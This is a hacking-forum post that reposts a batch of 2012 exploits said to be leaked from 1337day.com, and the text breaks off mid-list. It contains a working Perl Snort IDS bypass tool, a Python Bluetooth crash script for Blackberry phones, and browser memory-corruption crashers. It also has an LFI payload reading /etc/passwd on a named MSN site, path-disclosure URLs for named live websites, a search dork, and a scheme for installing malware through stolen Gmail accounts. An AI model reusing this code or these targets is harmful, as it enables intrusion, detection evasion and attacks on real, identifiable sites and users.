حالة الموضوع:
مغلق
  1. Yousef

    Yousef <link href="http://www.iq-team.org/vb/ghost/ghost. DeveloPer Plus

    الأنتساب:
    ‏1 نوفمبر 2012
    المشاركات:
    118
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    GoogleMarket bug for Android 4.1.1=>4.2 Remote Target DL PoC

    كود PHP:
    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    Google Market bug for Android 4.1.1 => 4.2 Jelly Bean Remote Target Download PoC
     
    You need
    :
    1Google Account
    2
    Android device 
    3
    PC browser
     
    You can install infinity count of apps to remote device from browser on PC
    .
     
    The key is
    1) if you entered your google account once on android device 
    2
    ) If you manage to get hold of someone else's account (gmail), you can install any apps from Google Play Market on this device.
    3) without asking owner of device for agreement.
     
    In such way you can install bad soft and also can install so many apps then memory of device will be filled 
     
    # 1337day.com [2012-12-12]
    MS Office Excel 2007 Seven Memory Corruption Vulnerability

    كود PHP:
    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    you can download POC from 
     
    http
    ://1337day.com/private_files/msexcel2007poc.rar 

    mirror http://www.mediafire.com/download.php?gc9h1yowx04c1c9
     
    # 1337day.com [2012-12-12]
    Snort Multiple HTTP Bypass <= 2.9.3.1 Exploit

    كود PHP:
    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    #!/usr/bin/perl
    use IO::Socket;
     
    # By Xianur0
    [email protected]
    # http://loscaballeros.mx/
    # Snort Multiple HTTP Bypass
     
    my $bypasscount=0;
    die(
    "Snort Multiple HTTP Bypass By Xianur0\n\nUse: snort.pl [URL]\nExample: snort.pl http://www.google.com/phpinfo.php\n\nUse: snort.pl [Path to snort rules]\nExample: snort.pl /home/xianur0/Descargas/snortrules-snapshot-2905/rules/\n"unless($ARGV[0]);
    if(-
    f $ARGV[0] || -d $ARGV[0]){
    print 
    "[-] Analyzing Rules...\n\n";
    checkrules($ARGV[0]);
    } else {
    tests();
    }
     
    sub hdump {
    my $offset 0;
    my(@array,$format);
    foreach 
    my $data (unpack("a16"x(length($_[0])/16)."a*",$_[0])) {
    my($len)=length($data);
    if (
    $len == 16) {
    @array = 
    unpack('N4'$data);
    $format="0x%08x (%05d)   %08x %08x %08x %08x   %s\n";
    } else {
    @array = 
    unpack('C*'$data);
    $_ sprintf "%2.2x"$_ for @array;
    push(@array, '  ') while $len++ < 16;
    $format="0x%08x (%05d)" .
    "   %s%s%s%s %s%s%s%s %s%s%s%s %s%s%s%s   %s\n";

    $data =~ tr/\0-\37\177-\377/./;
    printf $format,$offset,$offset,@array,$data;
    $offset += 16;
    }
    }
     
    sub snorthexdecode{
    my $encoded=$_[0];
    while(
    $encoded =~ /\|((\s*([\d\w]{2})\s*)+)\|/) {
    $cadena="\\|".$1."\\|";
    $remplazo="";
    my @caracteres=($cadena =~ /([\d\w]{2})/g);
    foreach 
    $caracter (@caracteres) {
    $remplazo.=chr(hex($caracter));
    }
    $encoded=~s/$cadena/$remplazo/g;
    }
    return 
    $encoded;
    }
    sub analizerules {
    my $pathrules=$_[0];
    if(-
    f $pathrules){
    open RULE,$pathrules;
    while(<
    RULE>) {
    my $rule=$_;
    $rule=~s/[\r\n]+$//g;
    if($rule=~/http_uri;/ && $rule=~/content:\s*"([^"]+)"/i){
    if(snorthexdecode($1)=~/([^"
    ]*\.\w{1,4})(\|3F\||\?)([^"]+)/){
    my 
    $bypass=$1."?junk&".$3;
    print "
    [!] Vuln rule ".$pathrules."".$rule."\n[!] URI Bypass".$bypass."\n\n";
    $bypasscount++;
    }
    } elsif(
    $rule=~/http_header;/ && $rule=~/content:"([^\"]+)"/){
    if(
    snorthexdecode($1)=~/^([^\:\s]+\:) (.+)$/){
    my $bypass=$1."\t".$2;
    print 
    "[!] Vuln rule ".$pathrules.": ".$rule."\n[!] Header Bypass: ".$bypass."\n\n";
    $bypasscount++;
    }
    }
    }
    elsif(-d $pathrules) {
    opendir (DIR$pathrules);
    while(
    readdir DIR) {
    analizerules($pathrules."/".$_) if($_ !~/^\.+$/);
    }
    }
    }
    sub checkrules {
    my $checkpath=$_[0];
    analizerules($checkpath);
    print 
    "[-] Bypassed rules: ".$bypasscount."\n";
    }
    sub tests {
    my $host="";
    my $port=80;
    my $path="";
    if(
    $ARGV[0]=~/^http:\/\/([^\/]+)(.*)$/){
    $host=$1;
    $path=$2;
    if(
    $host=~/^([^\:]+)\:(\d+)$/){
    $host=$1;
    $port=$2;
    }
    }
    if(
    $host!~/^[^\:]+$/){
    die(
    'Invalid URL!');
    }
    print 
    "[-]Target:\nHost: ".$host."\nPort: ".$port."\nPath: ".$path."\n\n";
    if(
    $path !~ "/(.+)"){
    die(
    'I need a path...');
    $path=$1;
    }
    $encodedpath=$path;
    $encodedpath=~s/([^\/])/"%" uc(sprintf("%2.2x",ord($1)))/eg;
    print 
    "[-] Encoded path: ".$encodedpath."\n";
    @
    orders=("1st (CRLF)","2nd (+Pipelining)","3rd","4th","5th");
    my $payload="POST / HTTP/1.1\r\n".
    "Content-Type: application/x-www-form-urlencoded\r\n".
    "Content-Length: 0\r\n".
    "Connection: Keep-Alive\r\n".
    "Host: ".$host.("\r\n"x12).
    "POST / HTTP/1.1\r\n".
    "Host: ".$host."\r\n".
    "Connection: Keep-Alive\r\n".
    "Content-Type: application/x-www-form-urlencoded\r\n".
    "Content-Length: 30".("\r\n"x12).
    "1234567890";
     
    @
    packets = ("\n\n\n\nHEAD ".$path." HTTP/1.1\r\nHost: ".$host.":".$port."\r\nConnection: Close\r\n\r\n","");
    $packets[1]=$payload.$packets[0];
     
    $i=0;
    foreach 
    $packet (@packets){
    my $sock = new IO::Socket::INET (
    PeerAddr => $host,
    PeerPort => $port,
    Proto => 'tcp',
    Reuse => 1,
    );
    die 
    "Could not create socket: $!\n" unless $sock;
    print 
    "[-] Seding ".$orders[$i]." test...\n";
    hdump($packet);
    print 
    $sock $packet;
    print 
    "\n[+] Headers:\n";
    my $todo="";
    while(<
    $sock>){
    $todo.=$_;
    }
    close($sock);
    hdump($todo);
    $i++;
    }

     
    # 1337day.com [2012-12-12]
    MSN LFI Vulnerability

    كود PHP:
    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    http://logitheque.msn.fr/recherche/recherche.php?searchstring=../../../../../../../../etc/passwd%00&plus=telecharger&chaine=forums 
     
    # 1337day.com [2012-12-12]
    Blackberry OBEX PUSH Crash (Bluetooth) PoC

    كود PHP:
    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    #!/usr/bin/python
     
    #Blackberry Bluetooth Crash (OBEX PUSH)
    # By Xianur0
    [email protected]
    # First you need to connect to RFCOMM device (rfcomm connect 0 <bluetooth mac address> [channel])
    # By default it uses the rfcomm0 but this number can be changed in the first argument of the command: rfcomm connect 0, rfcomm connect 1, etc...
    # ATTENTION: The channel of obex push can vary from blackberry to blackberry
     
    import binascii
    import serial
     
    filetosend
    ="/home/xianur0/image.jpg"
    nametosend="crashingyou.jpg"
     
    def filenamed(string):
    hexstring "00"
    for x in string:
    hexstring += hex(ord(x))[2:]+"00"
    return hexstring
     
    def bin2dec
    (hexstring):
    hexval ""
    for a in hexstring:
    aux hex(ord(a))[2:]
    if 
    len(aux) < 2:
    aux "0"+aux
    hexval 
    += aux
    return int(hexval16)
     
    def dec2hex(dec,largo):
    retorno hex(dec)[2:]
    if (
    len(retorno)/2)*!= len(retorno):
    retorno "0"+retorno
    if(len(retorno)/largo):
    for 
    i in range(largo-(len(retorno)/2)):
    retorno "00"+retorno
    return retorno
     
    def enviar
    (filepath,filename):
    serialrf None
    print "Loading..."
    try:
    serialrf serial.Serial('/dev/rfcomm0',9600# Change me if rfcomm is not 0
    except:
    return 
    1
    print "Ok!"
    filename filenamed(filename)
    filebinary ""
    filehandler open(filepath,'rb')
    for 
    linea in filehandler.readlines():
    filebinary += linea
    lengthfile 
    len(filebinary)
    print 
    "File Size:",lengthfile
    sizefragment 
    38
    while True:
    try:
    print 
    "Sending bytes..."
    serialrf.write(binascii.unhexlify("80000710001000")) # Inicializamos
    print "Reading..."
    status serialrf.read(1)
    print 
    hex(ord(status))
    if 
    hex(ord(status)) == "0xa0" or hex(ord(status)) == "0x10":
    resto serialrf.read(2)
    largo bin2dec(resto)-3
    if largo 0:
    resto serialrf.read(largo)
    else:
    return 
    2
    header 
    "01"+dec2hex((len(filename)/2)+4,2) + filename "00c3" dec2hex(len(filebinary),4)
    lengthheader = (len(filename)/2)+12
    fragmento 
    filebinary[0:sizefragment]
    envio binascii.unhexlify("02" dec2hex(lengthheader+(sizefragment+3),2) + header "48" dec2hex(len(fragmento)+3,2))
    envio += fragmento
    serialrf
    .write(envio)
    except:
    return 
    4
    serialrf
    .close()
    return 
    0
     
     
    enviar
    (filetosend,nametosend
     
    # 1337day.com [2012-12-12]
    Mozilla FireFox 17.0.1 Memory Corruption PoC

    كود PHP:
    <!--
    //...Leaked bY beBoss..// 
    //......12.12.2012.....//
    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
    0     _                   __           __       __                     1
    1   
    /' \            __  /'__`\        /\ \__  /'__`\                   0
    0  
    /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
    1  
    \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
    1                  \ \____/ >> Exploit database separated by exploit   0
    0                   \/___/          type (local, remote, DoS, etc.)    1
    1                                                                      1
    0  [+] Site            : 1337day.com                                   0
    1  [+] Support e-mail  : submit[at]1337day.com                         1
    0                                                                      0
    1               #########################################              1
    0               I'm KedAns-Dz member from Inj3ct0r Team                1
    1               #########################################              0
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
     
    ###
    # Title : Mozilla FireFox 17.0 Memory Corruption p0c
    # Author : KedAns-Dz
    # E-mail : ked-h (@hotmail.com / @1337day.com)
    # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
    # Web Site : www.1337day.com .net .org
    # FaCeb0ok : http://fb.me/Inj3ct0rK3d
    # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
    # Platform/CatID : local - 0day
    # Type : Local Exploit - proof of concept
    # Tested on : Linux SUSE - Enterprise v.11
    # Download : [http://download.cdn.mozilla.net/pub/mozilla.org/firefox/releases/17.0.1/linux-i686/fr/firefox-17.0.1.tar.bz2]
    ###
     
    # <3 <3 Greetings t0 Palestine <3 <3
    # Greetings To BarbarOS-Dz in the jail x_x ! F-ck HaCking, Lov3 Explo8ting
     
    -->
     
    <html>
    <head>
    <title>Memory Corruption bY KedAns-Dz</title>
    <body onload="javascript:KedAns();">
    <script language="JavaScript">
    function KedAns()
    {
     
    // (puf) it's just for make a buffer and Crash !
    // some shellcode's work with this proof of concept, maybe can able to Corrupt* the MEM and Exec remote codes
    var puf =unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
     
    document.write(puf); // Buffer1
     
    var buffer = '\x41\x42\x43' // ABC buffer
    for(i=0; i <= 999 ; ++i)
    {
    buffer+=buffer+buffer
    document.write(buffer); // Corrupt this !!!
     
    }
     
    // [ Memory Corruption !! (*__^) ]
     

    </script>
    </head>
    </body>
    </html>
    <!--
     
    #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
    # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
    # Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
    # +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
    # Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
    # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
    # Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
    # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
    #============================================================================================================ --> 
     
    # 1337day.com [2012-12-12]
    vBulletin 4.2.0 Full Path Disclosure Vulnerability

    كود PHP:
    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    The Full Path Disclosure is vBulletin 4.2.0in forumrunnerWith Full Path Disclosure you can get the path to the forum you're in and also (most of the times is the same) cpanel's username
     
    To see it go to:
     
    http://[path]/forumrunner/include/album.php
     
    It works in 90of the forums.
     
     
    Example:
    http://www.mgcproducts.com/forumrunner/include/album.php
    http://atheistdiscussion.com/forumrunner/include/album.php
    http://apolyton.net/forumrunner/include/album.php
    http://www.romaniancommunity.net/forumrunner/include/album.php
    http://www.ghosthax.com/forumrunner/include/album.php
    http://www.reddotcity.net/forumrunner/include/album.php
    http://www.sevenskins.com/forum/forumrunner/include/album.php
    http://www.purevb.com/forumrunner/include/album.php
    http://forum.hackersbrasil.com.br/forumrunner/include/album.php 
     
    # 1337day.com [2012-12-12]
    Wordpress 3.4.2 Full Path Disclosure Vulnerability

    كود PHP:
    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    The Full Path Disclosure is in Wordpress <= 3.4.2with this information you can get the path to the site you're in and (in most of the cases) cpanel's username.
     
    To see it go to:
     
    http://[path]/wp-includes/rss-functions.php
     
     
    Examples:
    http://tsmp.us/wp-includes/rss-functions.php
    http://tafeio.com/wp-includes/rss-functions.php
    http://santana1540.com.br/wp-includes/rss-functions.php
     
    It works in 90of the websites 
     
    # 1337day.com [2012-12-12]
    vBulletin 4.x/5.x multiple Full Puth Disclosure Vuln

    كود PHP:
    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    /includes/api/commonwhitelist_2.php
    /includes/api/commonwhitelist_5.php
    /includes/api/commonwhitelist_6.php
    /includes/api/1/album_album.php
    /includes/api/1/album_editalbum.php
    /includes/api/1/album_latest.php
    /includes/api/1/album_overview.php
    /includes/api/1/album_picture.php
    /includes/api/1/album_user.php
    /includes/api/1/announcement_edit.php
    /includes/api/1/announcement_view.php
    /includes/api/1/api_cmscategorylist.php
    /includes/api/1/api_cmssectionlist.php
    /includes/api/1/api_forumlist.php
    /includes/api/1/api_getnewtop.php
    /includes/api/1/api_getsecuritytoken.php
    /includes/api/1/api_getsessionhash.php
    /includes/api/1/api_init.php
    /includes/api/1/api_mobilepublisher.php
    /includes/api/1/api_usersearch.php
    /includes/api/1/blog_blog.php
    /includes/api/1/blog_bloglist.php
    /includes/api/1/blog_comments.php
    /includes/api/1/blog_custompage.php
    /includes/api/1/blog_dosendtofriend.php
    /includes/api/1/blog_list.php
    /includes/api/1/blog_members.php
    /includes/api/1/blog_post_comment.php
    /includes/api/1/blog_post_editblog.php
    /includes/api/1/blog_post_editcomment.php
    /includes/api/1/blog_post_edittrackback.php
    /includes/api/1/blog_post_newblog.php
    /includes/api/1/blog_post_postcomment.php
    /includes/api/1/blog_post_updateblog.php
    /includes/api/1/blog_sendtofriend.php
    /includes/api/1/blog_subscription_entrylist.php
    /includes/api/1/blog_subscription_userlist.php
    /includes/api/1/blog_usercp_addcat.php
    /includes/api/1/blog_usercp_editcat.php
    /includes/api/1/blog_usercp_editoptions.php
    /includes/api/1/blog_usercp_editprofile.php
    /includes/api/1/blog_usercp_modifycat.php
    /includes/api/1/blog_usercp_updateprofile.php
    /includes/api/1/editpost_editpost.php
    /includes/api/1/editpost_updatepost.php
    /includes/api/1/forum.php
    /includes/api/1/forumdisplay.php
    /includes/api/1/inlinemod_domergeposts.php
    /includes/api/1/list.php
    /includes/api/1/login_lostpw.php
    /includes/api/1/member.php
    /includes/api/1/memberlist_search.php
    /includes/api/1/misc_showattachments.php
    /includes/api/1/misc_whoposted.php
    /includes/api/1/newreply_newreply.php
    /includes/api/1/newreply_postreply.php
    /includes/api/1/newthread_postthread.php
    /includes/api/1/newthread_newthread.php
    /includes/api/1/poll_newpoll.php
    /includes/api/1/poll_polledit.php
    /includes/api/1/poll_showresults.php
    /includes/api/1/private_editfolders.php
    /includes/api/1/private_insertpm.php
    /includes/api/1/private_messagelist.php
    /includes/api/1/private_newpm.php
    /includes/api/1/private_showpm.php
    /includes/api/1/private_trackpm.php
    /includes/api/1/profile_editattachments.php
    /includes/api/1/profile_editoptions.php
    /includes/api/1/profile_editprofile.php
    /includes/api/1/register_addmember.php
    /includes/api/1/register_checkdate.php
    /includes/api/1/search_process.php
    /includes/api/1/search_showresults.php
    /includes/api/1/showthread.php
    /includes/api/1/subscription_addsubscription.php
    /includes/api/1/subscription_editfolders.php
    /includes/api/1/subscription_viewsubscription.php
    /includes/api/1/threadtag_managetags.php
    /includes/api/2/album_picture.php
    /includes/api/2/api_blogcategorylist.php
    /includes/api/2/blog_blog.php
    /includes/api/2/blog_bloglist.php
    /includes/api/2/blog_list.php
    /includes/api/2/blog_subscription_entrylist.php
    /includes/api/2/blog_subscription_userlist.php
    /includes/api/2/blog_usercp_groups.php
    /includes/api/2/content.php
    /includes/api/2/editpost_editpost.php
    /includes/api/2/forumdisplay.php
    /includes/api/2/member.php
    /includes/api/2/newreply_newreply.php
    /includes/api/2/forum.php
    /includes/api/2/poll_newpoll.php
    /includes/api/2/poll_polledit.php
    /includes/api/2/poll_showresults.php
    /includes/api/2/private_messagelist.php
    /includes/api/2/private_trackpm.php
    /includes/api/2/profile_editattachments.php
    /includes/api/2/search_showresults.php
    /includes/api/2/showthread.php
    /includes/api/3/api_gotonewpost.php
    /includes/api/4/album_user.php
    /includes/api/4/api_forumlist.php
    /includes/api/4/api_getnewtop.php
    /includes/api/4/breadcrumbs_create.php
    /includes/api/4/facebook_getforumid.php
    /includes/api/4/facebook_getnewforummembers.php
    /includes/api/4/get_vbfromfacebook.php
    /includes/api/4/login_facebook.php
    /includes/api/4/newreply_postreply.php
    /includes/api/4/newthread_postthread.php
    /includes/api/4/register.php
    /includes/api/4/register_addmember.php
    /includes/api/4/search_findusers.php
    /includes/api/4/subscription_viewsubscription.php
    /includes/api/5/api_init.php
    /includes/api/6/api_getnewtop.php
    /includes/api/6/api_gotonewpost.php
    /includes/api/6/content.php
    /includes/api/6/member.php
    /includes/api/6/newthread_newthread.php
    /includes/block/blogentries.php
    /includes/block/cmsarticles.php
    /includes/block/html.php
    /includes/block/newposts.php
    /includes/block/sgdiscussions.php
    /includes/block/tagcloud.php
    /includes/block/threads.php
    /forumrunner/include/subscriptions.php
    /forumrunner/include/search_forum.php
    /forumrunner/include/profile.php
    /forumrunner/include/post.php
    /forumrunner/include/pms.php
    /forumrunner/include/online.php
    /forumrunner/include/moderation.php
    /forumrunner/include/misc.php
    /forumrunner/include/login.php
    /forumrunner/include/get_thread.php
    /forumrunner/include/get_forum.php
    /forumrunner/include/cms.php
    /forumrunner/include/attach.php
    /forumrunner/include/announcement.php
    /forumrunner/include/album.php
    /forumrunner/support/vbulletin_methods.php
    /forumrunner/support/stringparser_bbcode.class.php
    /forumrunner/support/utils.php
    /forumrunner/support/other_methods.php
    /packages/skimlinks/hooks/postbit_display_complete.php
    /packages/skimlinks/hooks/showthread_complete.php
    /packages/skimlinks/hooks/userdata_start.php 
     
    # 1337day.com [2012-12-12]
    RealPlayer .html v15.0.6.14 Memory Corruption & Overflow PoC

    كود PHP:
    <!--
    //...Leaked bY beBoss..// 
    //......12.12.2012.....//
    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
    0     _                   __           __       __                     1
    1   
    /' \            __  /'__`\        /\ \__  /'__`\                   0
    0  
    /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
    1  
    \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
    1                  \ \____/ >> Exploit database separated by exploit   0
    0                   \/___/          type (local, remote, DoS, etc.)    1
    1                                                                      1
    0  [+] Site            : 1337day.com                                   0
    1  [+] Support e-mail  : submit[at]1337day.com                         1
    0                                                                      0
    1               #########################################              1
    0               I'm KedAns-Dz member from Inj3ct0r Team                1
    1               #########################################              0
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
     
    ###
    # Title : RealPlayer .html v15.0.6.14 Memory Corruption and Overflow POC
    # Author : KedAns-Dz
    # E-mail : ked-h (@hotmail.com / @1337day.com)
    # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
    # Web Site : www.1337day.com .net .org
    # FaCeb0ok : http://fb.me/Inj3ct0rK3d
    # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
    # Platform/CatID : local - 0day
    # Type : Local Exploit - proof of concept
    # Tested on : Windows7 (Fr)
    ###
     
    # <3 <3 Greetings t0 Palestine <3 <3
    # Greetings To BarbarOS-Dz in the jail x_x ! F-ck HaCking, Lov3 Explo8ting
     
    Info :
    Save the HTML Code as p0c.html and drop/open it with Realplayer
    ABCABC........... Boom !!! ^__^
     
    -->
     
    <html>
    <head>
    <title>Memory Corruption bY KedAns-Dz</title>
    <body onload="javascript:KedAns();">
    <script language="JavaScript">
    function KedAns()
    {
     
    // (puf) it's just for make a buffer and Crash !
    var puf =unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
    puf+=unescape("䅂䅂");
     
    document.write(puf); // Buffer1
     
    var buffer = '\x41\x42\x43' // ABC buffer
    for(i=0; i <= 999 ; ++i)
    {
    buffer+=buffer+buffer
    document.write(buffer); // Corrupt this !!!
     
    }
     
    // [ Memory Corruption !! (*__^) ]
     

    </script>
    </head>
    </body>
    </html>
    <!--
     
    #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
    # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
    # Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
    # +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
    # Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
    # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
    # Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
    # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
    #============================================================================================================ --> 
     
    # 1337day.com [2012-12-12]
    IPBoard 3.x.x/3.4 Full Path Disclosure

    كود PHP:
    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    Exploit:
    admin/upgrade/index.php?app=upgrade&s=&section[]=index&do=login
     
    Dork

    intext:Community Forum Software by IP.Board
     
    Fix

    Turn off display_errors in php.ini 
     
    # 1337day.com [2012-12-12]
    Steam Linux Closed Beta bypass authorization

    كود PHP:
    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    POC:
    0x01 Download the steam client for linux herehttp://media.steampowered.com/client/installer/steam.deb
     
    0x02 Login to your account using the Steam Client normally
     
    0x03 
    There will be a MsgBox saying that you do not have authorization, Do not click OK, and normally use as if authorization 
     
    # 1337day.com [2012-12-12]
    WordPress 3.5 multiple path disclosure vulnerabilities

    كود PHP:
    //...Leaked bY beBoss..// 
    //......12.12.2012.....//

    # Exploit Title: wordpress 3.5 multiple path disclosure vulnerabilities 
    # Date: [12.12.12]
    # Author: [Cyb3rboy]
    # Vendor or Software Link: [wordpress.org]
    # Version: [wordpress 3.5]
    # Category:: [webapps]
    # Google dork: [use brain ]
    # Tested on: [windows]
     
    the following directories is vulnerable to path disclosure vulnerability in word-press 3.5
     
    /wp-settings.php
    POC 
    :- http://sqayasia.com/wp-settings.php
    http://www.way2blogging.org/wp-settings.php
     
    /wp-includes/admin-bar.php
    POC
    :- http://sqayasia.com/wp-includes/admin-bar.php
    http://www.way2blogging.org/wp-includes/admin-bar.php
     
     
    /wp-includes/author-template.php
    Poc
    :- http://sqayasia.com/wp-includes/author-template.php
    http://www.way2blogging.org/wp-includes/author-template.php
     
    /wp-includes/canonical.php
    Poc
    :- http://sqayasia.com/wp-includes/canonical.php
     
    /wp-includes/category-template.php
    Poc
    :- http://sqayasia.com/wp-includes/category-template.php
    http://www.way2blogging.org/wp-includes/category-template.php
     
    /wp-includes/class-wp-embed.php
    Poc
    :- http://sqayasia.com/wp-includes/class-wp-embed.php
    http://www.way2blogging.org
     
    /wp-includes/media.php
    POc
    :- http://sqayasia.com/wp-includes/media.php
     
    /wp-includes/ms-default-constants.php
    Poc 
    :- http://sqayasia.com/wp-includes/ms-default-constants.php
    http://www.way2blogging.org
     
    /wp-includes/ms-default-filters.php
    Poc
    :- http://sqayasia.com/wp-includes/ms-default-filters.php
    http://www.way2blogging.org
     
    /wp-includes/ms-settings.php
    Poc
    :- http://sqayasia.com/wp-includes/ms-settings.php
    http://www.way2blogging.org
     
    /wp-includes/post.php
    Poc
    :- http://sqayasia.com/wp-includes/post.php
    http://www.way2blogging.org
     
    /wp-includes/rss.php
    Poc
    :- http://sqayasia.com/wp-includes/rss.php
    http://www.way2blogging.org/wp-includes/rss.php
     
    /wp-includes/user.php
    Poc
    :- http://sqayasia.com/wp-includes/user.php
    http://www.way2blogging.org/wp-includes/user.php
     
    /wp-includes/theme.php
    Poc
    :- http://sqayasia.com/wp-includes/theme.php
    http://www.way2blogging.org/wp-includes/theme.php
     
    /wp-includes/vars.php
    Poc
    :- http://sqayasia.com/wp-includes/vars.php
    http://www.way2blogging.org/wp-includes/vars.php
     
    /wp-includes/class-wp-http-ixr-client.php
    Poc
    :- http://sqayasia.com/wp-includes/class-wp-http-ixr-client.php
     
    /wp-includes/class-wp-image-editor-gd.php
    Poc
    :- http://sqayasia.com/wp-includes/class-wp-image-editor-gd.php
    http://www.way2blogging.org/wp-includes/class-wp-image-editor-gd.php
     
    /wp-includes/class-wp-image-editor-imagick.php
    Poc
    :- http://sqayasia.com/wp-includes/class-wp-image-editor-imagick.php
    http://www.way2blogging.org/wp-includes/class-wp-image-editor-imagick.php
     
    /wp-includes/class-wp-xmlrpc-server.php
    Poc
    :- http://sqayasia.com/wp-includes/class-wp-xmlrpc-server.php
    http://www.way2blogging.org/wp-includes/class-wp-xmlrpc-server.php
     
    /wp-includes/class.wp-scripts.php
    Poc
    :- http://sqayasia.com/wp-includes/class.wp-scripts.php
    http://www.way2blogging.org/wp-includes/class.wp-scripts.php
     
    /wp-includes/class.wp-styles.php
    Poc
    :- http://sqayasia.com/wp-includes/class.wp-styles.php
    http://www.way2blogging.org/wp-includes/class.wp-styles.php
     
    /wp-includes/comment-template.php
    Poc
    :- http://sqayasia.com/wp-includes/comment-template.php
    http://www.way2blogging.org/wp-includes/comment-template.php
     
    /wp-includes/default-filters.php
    Poc
    :- http://sqayasia.com/wp-includes/default-filters.php
    http://www.way2blogging.org/wp-includes/default-filters.php
     
    /wp-includes/default-widgets.php
    Poc
    :- http://sqayasia.com/wp-includes/default-widgets.php
    http://www.way2blogging.org/wp-includes/default-widgets.php
     
    /wp-includes/feed-atom-comments.php
    Poc
    :- http://sqayasia.com/wp-includes/feed-atom-comments.php
    http://www.way2blogging.org/wp-includes/feed-atom-comments.php
     
    /wp-includes/feed-atom.php
    Poc
    :- http://sqayasia.com/wp-includes/feed-atom.php
    http://www.way2blogging.org/wp-includes/feed-atom.php
     
    /wp-includes/feed-rdf.php
    Poc
    :-http://sqayasia.com/wp-includes/feed-rdf.php
    http://www.way2blogging.org/wp-includes/feed-rdf.php
     
    /wp-includes/feed-rss.php
    Poc
